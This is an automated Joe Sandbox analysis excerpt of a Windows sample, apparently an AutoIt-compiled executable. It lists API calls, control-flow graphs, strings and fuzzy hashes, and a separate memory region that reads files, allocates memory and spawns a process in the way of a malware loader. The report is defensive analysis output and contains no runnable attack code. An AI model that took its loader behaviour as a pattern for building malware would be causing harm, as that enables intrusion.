                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00123227
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0012316A,?,?), ref: 00123232
                                                          • CreatePopupMenu.USER32 ref: 00123246
                                                          • PostQuitMessage.USER32(00000000), ref: 00123267
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 31a55b47dde2adaef650a900c8b873234807fb202c2701b1ea52b66d2daeff92
                                                          • Instruction ID: 291bce9eff0b27c3defed53c1ff5859bbd2e7c4aa8a35430d3d987ecf08964ed
                                                          • Opcode Fuzzy Hash: 31a55b47dde2adaef650a900c8b873234807fb202c2701b1ea52b66d2daeff92
                                                          • Instruction Fuzzy Hash: 3E413B35200228FBDB186B78BD4DB79362AF745354F040125F962965E2CB7ACAB0D7E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 499 158d45-158d55 500 158d57-158d6a call 14f2c6 call 14f2d9 499->500 501 158d6f-158d71 499->501 515 1590f1 500->515 502 158d77-158d7d 501->502 503 1590d9-1590e6 call 14f2c6 call 14f2d9 501->503 502->503 507 158d83-158dae 502->507 521 1590ec call 1527ec 503->521 507->503 510 158db4-158dbd 507->510 513 158dd7-158dd9 510->513 514 158dbf-158dd2 call 14f2c6 call 14f2d9 510->514 518 1590d5-1590d7 513->518 519 158ddf-158de3 513->519 514->521 520 1590f4-1590f9 515->520 518->520 519->518 523 158de9-158ded 519->523 521->515 523->514 526 158def-158e06 523->526 527 158e23-158e2c 526->527 528 158e08-158e0b 526->528 532 158e2e-158e45 call 14f2c6 call 14f2d9 call 1527ec 527->532 533 158e4a-158e54 527->533 530 158e15-158e1e 528->530 531 158e0d-158e13 528->531 534 158ebf-158ed9 530->534 531->530 531->532 564 15900c 532->564 536 158e56-158e58 533->536 537 158e5b-158e79 call 153820 call 1529c8 * 2 533->537 539 158fad-158fb6 call 15f89b 534->539 540 158edf-158eef 534->540 536->537 568 158e96-158ebc call 159424 537->568 569 158e7b-158e91 call 14f2d9 call 14f2c6 537->569 553 159029 539->553 554 158fb8-158fca 539->554 540->539 544 158ef5-158ef7 540->544 544->539 549 158efd-158f23 544->549 549->539 550 158f29-158f3c 549->550 550->539 555 158f3e-158f40 550->555 557 15902d-159045 ReadFile 553->557 554->553 559 158fcc-158fdb GetConsoleMode 554->559 555->539 560 158f42-158f6d 555->560 562 159047-15904d 557->562 563 1590a1-1590ac GetLastError 557->563 559->553 565 158fdd-158fe1 559->565 560->539 567 158f6f-158f82 560->567 562->563 572 15904f 562->572 570 1590c5-1590c8 563->570 571 1590ae-1590c0 call 14f2d9 call 14f2c6 563->571 566 15900f-159019 call 1529c8 564->566 565->557 573 158fe3-158ffd ReadConsoleW 565->573 566->520 567->539 575 158f84-158f86 567->575 568->534 569->564 582 159005-15900b call 14f2a3 570->582 583 1590ce-1590d0 570->583 571->564 579 159052-159064 572->579 580 158fff GetLastError 573->580 581 15901e-159027 573->581 575->539 585 158f88-158fa8 575->585 579->566 589 159066-15906a 579->589 580->582 581->579 582->564 583->566 585->539 594 159083-15908e 589->594 595 15906c-15907c call 158a61 589->595 596 159090 call 158bb1 594->596 597 15909a-15909f call 1588a1 594->597 606 15907f-159081 595->606 604 159095-159098 596->604 597->604 604->606 606->566
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8cf4da4036c47451ef3e5cece44c3f306d3c921825e06e104aa6a5631dcb9ee
                                                          • Instruction ID: e72b5d31b90dc5c5c93123d00e18b0622770a067d4a968b928959273cbc374bb
                                                          • Opcode Fuzzy Hash: a8cf4da4036c47451ef3e5cece44c3f306d3c921825e06e104aa6a5631dcb9ee
                                                          • Instruction Fuzzy Hash: 24C1F074A04249EFCF11DFA8C845BADBBB4AF19311F044199FC25AB3D2C770994ACB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 607 23c0920-23c0972 call 23c0820 CreateFileW 610 23c097b-23c0988 607->610 611 23c0974-23c0976 607->611 614 23c098a-23c0996 610->614 615 23c099b-23c09b5 VirtualAlloc 610->615 612 23c0b36-23c0b3a 611->612 614->612 616 23c09be-23c09e4 CreateFileW 615->616 617 23c09b7-23c09b9 615->617 618 23c0a08-23c0a22 ReadFile 616->618 619 23c09e6-23c0a03 616->619 617->612 621 23c0a24-23c0a41 618->621 622 23c0a46-23c0a4a 618->622 619->612 621->612 624 23c0a4c-23c0a69 622->624 625 23c0a6e-23c0a74 622->625 624->612 626 23c0a7f-23c0aa2 625->626 628 23c0aa4 626->628 629 23c0ac7-23c0ae1 WriteFile 626->629 632 23c0aae-23c0ac5 628->632 633 23c0aa6-23c0aac 628->633 634 23c0b0c-23c0b31 FindCloseChangeNotification VirtualFree 629->634 635 23c0ae3-23c0b0a 629->635 632->626 633->629 633->632 634->612 635->612
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 023C0965
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                                                          • Instruction ID: 07033d5dccfab08ba3d5a91132893904e627711605aa2837f67cb1d6a61a6f1b
                                                          • Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                                                          • Instruction Fuzzy Hash: CD71FC75A10248EBDF24DFA4CC85FEEB779BF48714F208558F605AB280DB74AA40CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 654 122c63-122cd3 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00122C91
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00122CB2
                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00121CAD,?), ref: 00122CC6
                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00121CAD,?), ref: 00122CCF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: ace82385f5488bcfa71296f5abba497f9e4d00dc6c1893268961c59306a7d952
                                                          • Instruction ID: 5eab2cee4c423bb354819f6269661f77e76eb08a54ed3a1bac902bbf8a10c4f1
                                                          • Opcode Fuzzy Hash: ace82385f5488bcfa71296f5abba497f9e4d00dc6c1893268961c59306a7d952
                                                          • Instruction Fuzzy Hash: 91F0DA76540290BAEB315717AC08EB73EBDE7C7F70B00005AF900A69A0C7611890DAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00192C05
                                                          • DeleteFileW.KERNEL32(?), ref: 00192C87
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00192C9D
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00192CAE
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00192CC0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$Copy
                                                          • String ID:
                                                          • API String ID: 3226157194-0
                                                          • Opcode ID: a1ad76520c8a1e5f6d2548ce2d50defd7b2eeaeeffbee3e8045fad025532bc1c
                                                          • Instruction ID: d8b29561e1ecd41e3f52b3fa672c0e86defac5d2111bc45b5a77fb8540989197
                                                          • Opcode Fuzzy Hash: a1ad76520c8a1e5f6d2548ce2d50defd7b2eeaeeffbee3e8045fad025532bc1c
                                                          • Instruction Fuzzy Hash: 20B13B72D00129ABDF25DBA4DC85EDEBBBDEF58350F1040A6F609E7151EB309A448FA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 875 23c24e0-23c25f4 call 23c0000 call 23c2390 880 23c2609 875->880 881 23c25f6-23c25fe 875->881 882 23c2611-23c2678 call 23c2300 CreateFileW 880->882 881->880 885 23c2600-23c2607 call 23c2360 881->885 891 23c267f-23c268f 882->891 892 23c267a 882->892 885->880 885->882 895 23c2696-23c26b0 VirtualAlloc 891->895 896 23c2691 891->896 893 23c274c-23c2751 892->893 897 23c26b7-23c26ce ReadFile 895->897 898 23c26b2 895->898 896->893 899 23c26d0 897->899 900 23c26d2-23c26e7 call 23c10d0 897->900 898->893 899->893 902 23c26ec-23c2726 call 23c2410 call 23c1300 900->902 907 23c2728-23c273d call 23c2460 902->907 908 23c2742-23c274a 902->908 907->908 908->893
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023C266E
                                                          • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 023C26A3
                                                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 023C26C9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: File$AllocCreateReadVirtual
                                                          • String ID: L996HVADYISIR4Z8GA81UYRKXT6BJ
                                                          • API String ID: 3585551309-3741869921
                                                          • Opcode ID: 223d3a0e558cf1e14d9db6624e69493ee5cc66646a8d59d76d9becf7921142b4
                                                          • Instruction ID: 84b9219becea7006ca04f5eacfe88400430be1c9714d2a689f62b2473d9899ac
                                                          • Opcode Fuzzy Hash: 223d3a0e558cf1e14d9db6624e69493ee5cc66646a8d59d76d9becf7921142b4
                                                          • Instruction Fuzzy Hash: 1E719030D04288DAEF11DBB4D844BEFBA79AF15304F14419CE6487B2C1DBB95E49CB66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 947 123b1c-123b27 948 123b99-123b9b 947->948 949 123b29-123b2e 947->949 950 123b8c-123b8f 948->950 949->948 951 123b30-123b48 RegOpenKeyExW 949->951 951->948 952 123b4a-123b69 RegQueryValueExW 951->952 953 123b80-123b8b RegCloseKey 952->953 954 123b6b-123b76 952->954 953->950 955 123b90-123b97 954->955 956 123b78-123b7a 954->956 957 123b7e 955->957 956->957 957->953
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00123B0F,SwapMouseButtons,00000004,?), ref: 00123B40
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00123B0F,SwapMouseButtons,00000004,?), ref: 00123B61
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00123B0F,SwapMouseButtons,00000004,?), ref: 00123B83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: e583932c248aa248c76e4ec7d314b301e5e7abe0d5d245e2b1ed4498982fe0b0
                                                          • Instruction ID: 45fc9ff7657e97da407cd8c8547456f9f5ca79b6e30e46ce7e1b32c8e6cdede6
                                                          • Opcode Fuzzy Hash: e583932c248aa248c76e4ec7d314b301e5e7abe0d5d245e2b1ed4498982fe0b0
                                                          • Instruction Fuzzy Hash: 351127B5611228FFDB218FA5EC84AAEBBB8EF44744B10856AB815D7110E3359E509BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Variable must be of type 'Object'., xrefs: 001732B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Variable must be of type 'Object'.
                                                          • API String ID: 0-109567571
                                                          • Opcode ID: 31c704c522bd5d6418efc8a6160c09e361c9249ccc5161db33b8ea2653ed37f7
                                                          • Instruction ID: 91be284f43a6cc90404edfc8d11892a8c24896b78dc959c8e5649198bedb7b42
                                                          • Opcode Fuzzy Hash: 31c704c522bd5d6418efc8a6160c09e361c9249ccc5161db33b8ea2653ed37f7
                                                          • Instruction Fuzzy Hash: AFC28C75A00224CFCB24CF98E884AADB7F1FF18310F258169E955AB391D371EDA1CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001633A2
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00123A04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                          • String ID: Line:
                                                          • API String ID: 2289894680-1585850449
                                                          • Opcode ID: f770c30e9dbb4b364f6d19f19c32aa76246f84ddd797257594d2682d9ff743f4
                                                          • Instruction ID: e83c38368b6dd7e06ab5588a24c17b175ecad22ea313d46b77a404ec4c44a535
                                                          • Opcode Fuzzy Hash: f770c30e9dbb4b364f6d19f19c32aa76246f84ddd797257594d2682d9ff743f4
                                                          • Instruction Fuzzy Hash: 7531F471508324ABC725EB20EC45FEBB3D8BF55324F00092AF5A9835D1DB749AA9C7C2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00140668
                                                            • Part of subcall function 001432A4: RaiseException.KERNEL32(?,?,?,0014068A,?,001F1444,?,?,?,?,?,?,0014068A,00121129,001E8738,00121129), ref: 00143304
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00140685
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Unknown exception
                                                          • API String ID: 3476068407-410509341
                                                          • Opcode ID: d99374fc63f9b799002c1e53bf25229e1688ea8444c11e82eab23b68aa2a60ab
                                                          • Instruction ID: 599e0fe3561a2b211ed1f7002c2a6b59dc52f949c46ba9c67c9c95642166a1b5
                                                          • Opcode Fuzzy Hash: d99374fc63f9b799002c1e53bf25229e1688ea8444c11e82eab23b68aa2a60ab
                                                          • Instruction Fuzzy Hash: 81F0C23490060D77CB05BAA6EC4AC9E7B6C9F64310B604535BA28A65F1EF71DA26C980
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 023C10A5
                                                          • ExitProcess.KERNEL32(00000000), ref: 023C10C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateExit
                                                          • String ID: D
                                                          • API String ID: 126409537-2746444292
                                                          • Opcode ID: 0aafd38257db3961b4310f0e794442a93b83cea40b82929cdc0aba5a9ff13e5d
                                                          • Instruction ID: 09bbffef91c17ee4f832d86d682f40c35590be1cd213092fcaaf7130c8aebbe0
                                                          • Opcode Fuzzy Hash: 0aafd38257db3961b4310f0e794442a93b83cea40b82929cdc0aba5a9ff13e5d
                                                          • Instruction Fuzzy Hash: 90F0ECB594024CABDB60DFE0CD49FEE777DBF04701F108518BA4A9A181DF749A088B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0019302F
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00193044
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: bd928c0d6546c397ebec909374e41e62f501611de3780469d6c221d1ea341562
                                                          • Instruction ID: 990c107c187f88f62fd939b90a483238f1f9a3924f6ca386ef78a9c302e605ee
                                                          • Opcode Fuzzy Hash: bd928c0d6546c397ebec909374e41e62f501611de3780469d6c221d1ea341562
                                                          • Instruction Fuzzy Hash: 75D05E7290032867DA20A7A5AC0EFCBBA7CDB04750F4002A1B755E2091DBB09984CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001A82F5
                                                          • TerminateProcess.KERNEL32(00000000), ref: 001A82FC
                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 001A84DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                          • String ID:
                                                          • API String ID: 146820519-0
                                                          • Opcode ID: 2a753516a0f396322b9646132aef524c98dca0fdc4a238f86c6f7d2fd2b4fd5b
                                                          • Instruction ID: 8506edeeb9aa4486adf3b580475948cdb2152e1dfbb6b42f4ba80cd9cebcbb6e
                                                          • Opcode Fuzzy Hash: 2a753516a0f396322b9646132aef524c98dca0fdc4a238f86c6f7d2fd2b4fd5b
                                                          • Instruction Fuzzy Hash: 82126A75A083019FC714DF28C484B6ABBE5BF99318F04895DF8998B292DB31ED45CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd238382df86311fc6866d5b424968d974793ab02460c8fd923811cbe1bb76a3
                                                          • Instruction ID: b8cc779fb84ea3ee1eb3f9f30f771fb33ada1b5d5776c96dda079acf867e9300
                                                          • Opcode Fuzzy Hash: dd238382df86311fc6866d5b424968d974793ab02460c8fd923811cbe1bb76a3
                                                          • Instruction Fuzzy Hash: 3351F271D00609DFCF159FA8C859FAE7BBAAF15312F140059FC21AF2A1D7719A0ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00121BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00121BF4
                                                            • Part of subcall function 00121BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00121BFC
                                                            • Part of subcall function 00121BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00121C07
                                                            • Part of subcall function 00121BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00121C12
                                                            • Part of subcall function 00121BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00121C1A
                                                            • Part of subcall function 00121BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00121C22
                                                            • Part of subcall function 00121B4A: RegisterWindowMessageW.USER32(00000004,?,001212C4), ref: 00121BA2
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0012136A
                                                          • OleInitialize.OLE32 ref: 00121388
                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 001624AB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
